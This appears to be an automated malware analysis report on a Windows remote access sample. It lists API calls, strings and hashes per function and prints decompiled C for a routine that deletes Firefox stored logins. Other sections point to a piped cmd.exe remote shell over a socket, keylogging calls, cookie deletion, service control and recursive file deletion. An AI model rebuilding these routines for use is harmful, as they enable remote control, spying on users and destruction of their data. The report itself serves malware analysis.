0x004058b4
0x00000000
0x004058b4
0x00405862
0x00405867
0x0040586a
0x0040586c
0x00000000
0x00000000
0x00405872
0x0040587d
0x00405880
0x00405882
0x00405883
0x00000000
0x0040569b
0x0040569b
0x004056a2
0x004056a7
0x004056a9
0x00405982
0x00405987
0x00405992
0x0040599e
0x004059a4
0x004059aa
0x004059ac
0x004059af
0x004059b7
0x004059c4
0x004059c4
0x004056c2
0x004056ce
0x004056ea
0x004056f4
0x004056fe
0x00405708
0x00000000
0x00405724
0x00405726
0x0040572f
0x00405737
0x0040573f
0x00405749
0x0040575e
0x00405763
0x00405769
0x0040576e
0x00405773
0x0040579c
0x004057a3
0x004057ad
0x004057b4
0x004057c3
0x004057c4
0x004057c5
0x004057c6
0x004057ce
0x004057d3
0x004057dc
0x004057e1
0x004057e6
0x004057f2
0x004057f4
0x004057fa
0x00405800
0x00000000
0x00000000
0x00405806
0x0040580b
0x00000000
0x004058e4
0x004058ef
0x004058f2
0x004058f4
0x00405900
0x00405946
0x00405902
0x00405909
0x00405912
0x0040591e
0x00405932
0x0040593d
0x0040593f
0x0040593f
0x0040594b
0x00405951
0x00405951
0x00405964
0x00405970
0x0040597c
0x00000000
0x0040597c
0x00405708

APIs

__Init_thread_footer.LIBCMT ref: 0040563C

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

__Init_thread_footer.LIBCMT ref: 00405679
CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
CreateProcessA.KERNEL32 ref: 0040578D
Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845

Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
TerminateProcess.KERNEL32(00000000), ref: 00405964
CloseHandle.KERNEL32 ref: 00405970
CloseHandle.KERNEL32 ref: 0040597C
CloseHandle.KERNEL32 ref: 00405992
CloseHandle.KERNEL32 ref: 0040599E

Strings

SystemDrive, xrefs: 004056AF
cmd.exe, xrefs: 0040569B

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: 6209404a36c534692876af1b64d00be9eda98b98fe014b7b6bc142202bf80baf
Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
Opcode Fuzzy Hash: 6209404a36c534692876af1b64d00be9eda98b98fe014b7b6bc142202bf80baf
Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A012(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020D5(__ebx,  &_v100);
				E004020D5(__ebx,  &_v76);
				E004020D5(__ebx,  &_v28);
				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				L00401FD1( &_v28, _t46, _t135, E004075C2(_t89,  &_v52, E0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				L00401FC7();
				L00401FC7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(L00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
				L00401FC7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									L00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									L00401FC7();
									L00401FC7();
									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									L00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									L00401FC7();
									L00401FC7();
									_t73 = DeleteFileA(L00401F95( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(L00401F95( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040A6EF(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040A6EF(_t89,  &_v28, _t143);
					L17:
					L00401FC7();
					L00401FC7();
					L00401FC7();
					return 1;
				}
			}

0x0040a012
0x0040a012
0x0040a012
0x0040a01f
0x0040a027
0x0040a02f
0x0040a03c
0x0040a05c
0x0040a064
0x0040a06c
0x0040a07d
0x0040a09a
0x0040a09c
0x0040a0a1
0x0040a0a4
0x0040a1da
0x0040a1da
0x0040a1e8
0x0040a1ea
0x00000000
0x00000000
0x0040a0cd
0x0040a0d4
0x00000000
0x00000000
0x0040a0da
0x0040a0e0
0x0040a0e3
0x0040a0f1
0x0040a0f1
0x0040a0f7
0x0040a0f7
0x0040a0f9
0x0040a0f9
0x0040a0fd
0x0040a102
0x0040a105
0x0040a10b
0x00000000
0x00000000
0x0040a10d
0x0040a10e
0x0040a111
0x00000000
0x00000000
0x0040a113
0x0040a11c
0x0040a11c
0x0040a11e
0x0040a14e
0x0040a156
0x0040a161
0x0040a17e
0x0040a190
0x0040a19b
0x0040a1a3
0x0040a1b1
0x0040a1b7
0x0040a1b9
0x0040a1bb
0x0040a1bb
0x0040a1ca
0x0040a1d0
0x0040a1d2
0x0040a1d4
0x0040a1d4
0x0040a1d2
0x00000000
0x0040a11e
0x0040a117
0x0040a119
0x0040a119
0x00000000
0x0040a119
0x0040a0e9
0x0040a0eb
0x00000000
0x00000000
0x00000000
0x0040a0eb
0x0040a1fa
0x0040a1ff
0x0040a208
0x00000000
0x0040a0aa
0x0040a0ab
0x0040a0bb
0x0040a0c0
0x0040a20e
0x0040a211
0x0040a219
0x0040a221
0x0040a22c
0x0040a22c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
FindClose.KERNEL32(00000000), ref: 0040A0AB
FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
FindClose.KERNEL32(00000000), ref: 0040A208

Strings

\logins.json, xrefs: 0040A12A
\key3.db, xrefs: 0040A16C
[Firefox StoredLogins Cleared!], xrefs: 0040A1F5
[Firefox StoredLogins not found], xrefs: 0040A0B6
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A034
UserProfile, xrefs: 0040A042

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
Opcode Fuzzy Hash: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
FindClose.KERNEL32(00000000), ref: 0040A2BB
FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
GetLastError.KERNEL32 ref: 0040A397
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
FindClose.KERNEL32(00000000), ref: 0040A3D1
FindClose.KERNEL32(00000000), ref: 0040A3F2

Strings

[Firefox Cookies not found], xrefs: 0040A2C6, 0040A3BE
[Firefox cookies found, cleared!], xrefs: 0040A3FF
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A248
UserProfile, xrefs: 0040A256
\cookies.sqlite, xrefs: 0040A34E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
Opcode Fuzzy Hash: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004160DB, Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID:
API String ID: 2247270020-0
Opcode ID: 2a95b1dc2d7ea87457b6892e2edf2988bf99cf90c0ea0d464b8aeb3cdcf6ae09
Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
Opcode Fuzzy Hash: 2a95b1dc2d7ea87457b6892e2edf2988bf99cf90c0ea0d464b8aeb3cdcf6ae09
Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00417754, Relevance: 13.6, APIs: 9, Instructions: 147fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,0046C518,00000001), ref: 004177EB
FindNextFileW.KERNEL32(00000000,?,?,0046C518,00000001), ref: 00417822
RemoveDirectoryW.KERNEL32(?,?,0046C518,00000001), ref: 0041789C
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 004178CA
RemoveDirectoryW.KERNEL32(0046C518,?,0046C518,00000001), ref: 004178D3
SetFileAttributesW.KERNEL32(?,00000080,?,0046C518,00000001), ref: 004178F0
DeleteFileW.KERNEL32(?,?,0046C518,00000001), ref: 004178FD
GetLastError.KERNEL32(?,0046C518,00000001), ref: 00417925
FindClose.KERNEL32(00000000,?,0046C518,00000001), ref: 00417938

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
Instruction ID: 6da704504b35dc0d8a2ea9a1e9b01ebd60215a2eebb254005b65f5ca46bb9893
Opcode Fuzzy Hash: a2017bcb7b032fc72568f7b298dad3f7503c270b7714985d0920de0a3b4697ef
Instruction Fuzzy Hash: 8051273450421A8ACF24EF78C8886FAB774FF54305F5041EAE84993251FB359ECACB98

Uniqueness

Uniqueness Score: -1.00%

Function 004163AD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA

Strings

3`A, xrefs: 004163C1, 004163FC

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID: 3`A
API String ID: 276877138-3175782522
Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9

Uniqueness

Uniqueness Score: -1.00%

Function 00411205, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 479registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
GetProcAddress.KERNEL32(00000000), ref: 004115CE

Strings

Shlwapi.dll, xrefs: 004115C2
SHDeleteKeyW, xrefs: 004115BD

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 472a02be97092b9ba2ca67431c64de73fbd6def23a08ce93cda8a82f4d1487b9
Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
Opcode Fuzzy Hash: 472a02be97092b9ba2ca67431c64de73fbd6def23a08ce93cda8a82f4d1487b9
Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A

Uniqueness

Uniqueness Score: -1.00%

Function 00413958, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00413965
OpenProcessToken.ADVAPI32(00000000), ref: 0041396C
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041397E
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041399D
GetLastError.KERNEL32 ref: 004139A3

Strings

SeShutdownPrivilege, xrefs: 00413978

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
Instruction ID: fcc62124dca6382e8ff7f462a1d037d759b9923c43a5f98482535144c24e2b82
Opcode Fuzzy Hash: 94602a98415b27b9a6c2aabf7476c335bfb2bc105e34b2d46e9cbd2c65603840
Instruction Fuzzy Hash: 44F03A71902229ABDB10AFA0ED0DAEFBF7CEF05652F100064B805A1056E6348B14CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 0044D3FA, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0044D540

Strings

1#QNAN, xrefs: 0044E746
1#SNAN, xrefs: 0044E73F
1#IND, xrefs: 0044E738
1#INF, xrefs: 0044E74D

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 004077EC, Relevance: 9.3, APIs: 6, Instructions: 324fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004077F1

Part of subcall function 00404A08: connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

__CxxThrowException@8.LIBVCRUNTIME ref: 0040789E
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FC
FindNextFileW.KERNEL32(00000000,?), ref: 00407954
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796B

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

FindClose.KERNEL32(00000000), ref: 00407BA9

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
String ID:
API String ID: 2104358809-0
Opcode ID: edff48c5eeedbca8edf892fff607a5bebdc82142796f49dabbea8aeed9edd45d
Instruction ID: c2b305b608749dbe3c980790889d4cdccc335bbb97c8ab2c1357a9fa12a4aca1
Opcode Fuzzy Hash: edff48c5eeedbca8edf892fff607a5bebdc82142796f49dabbea8aeed9edd45d
Instruction Fuzzy Hash: DAC170729041099ADB14FB61CD52AEE7375AF10318F10417FE906B71D2EF386B49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004089BA, Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
GetKeyboardLayout.USER32 ref: 00408A00
GetKeyState.USER32 ref: 00408A0A
GetKeyboardState.USER32(?), ref: 00408A17
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
Instruction ID: 26b3eb51535ef2b13c0bd12becad5a44fa7f6c6827bdf572dc9a3ff542bbf600
Opcode Fuzzy Hash: 28d55651ec39c1e0e1e44cca33abdfe281183258b8dcf964721f4baf851690d3
Instruction Fuzzy Hash: B2110072900208BBDB109FA4DC49FEA77ACEB0C746F100465FA04E6191DA75EA54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044A6BC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A755
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044A9DB,?,00000000), ref: 0044A77E
GetACP.KERNEL32(?,?,0044A9DB,?,00000000), ref: 0044A793

Strings

ACP, xrefs: 0044A6DA
OCP, xrefs: 0044A710

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
Instruction ID: 46499b20fc6e19d8fdaaf79e5441ca5821e5cfb246ab753f5a47199e6154391f
Opcode Fuzzy Hash: eca72fe68e61a17013779279ff44b1afc3dcda18dc1819e1e1cc02f4b6913e30
Instruction Fuzzy Hash: 3C21F876680200A6F730CF64C901B9773BAEF54F65B568427E80AC7312E73ADD61C39A

Uniqueness

Uniqueness Score: -1.00%

Function 0044A890, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044A99C
IsValidCodePage.KERNEL32(00000000), ref: 0044A9F7
IsValidLocale.KERNEL32(?,00000001), ref: 0044AA06
GetLocaleInfoW.KERNEL32(?,00001001,0043E2C1,00000040,?,0043E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0044AA4E
GetLocaleInfoW.KERNEL32(?,00001002,0043E341,00000040), ref: 0044AA6D

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
Instruction ID: 9b105efebd2c88567e68d059c0bbbfc36751d73e0e30cf1546c616c965cf3a16
Opcode Fuzzy Hash: ee551fdf1c3de97742cd8df79b3566f25b0096286ea1fed63c8c741eae7e60fe
Instruction Fuzzy Hash: CC5181B1940205ABFB10DFA5CC45ABF73B8BF08701F15486BE900E7291D7789914CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0043FA50, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

gD, xrefs: 0043FA6D, 0043FC18, 0043FE3C, 0043FDD6, 0043FC66, 0043FBF4
gD, xrefs: 0043FEB8, 0043FCA2, 0043FB31

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: gD$gD
API String ID: 0-1761650873
Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
Instruction ID: 1c2153c09f84a79ea258590f09f89f50964c174f8247bd10d492af3eb38c561b
Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
Instruction Fuzzy Hash: E5022B71E002199FDF14CFA9C9806AEBBF1FF48314F25926AD919E7341D734AE458B84

Uniqueness

Uniqueness Score: -1.00%

Function 0040D211, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON

Download Yara Rule

APIs

Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D231
Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
CloseHandle.KERNEL32(00000000), ref: 0040D3E9

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
String ID:
API String ID: 715332099-0
Opcode ID: cefc01ee75dd76c23d776ef3f1d742279f651e097c3a1724514ace9d7abc3bff
Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
Opcode Fuzzy Hash: cefc01ee75dd76c23d776ef3f1d742279f651e097c3a1724514ace9d7abc3bff
Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58

Uniqueness

Uniqueness Score: -1.00%

Function 0044A343, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
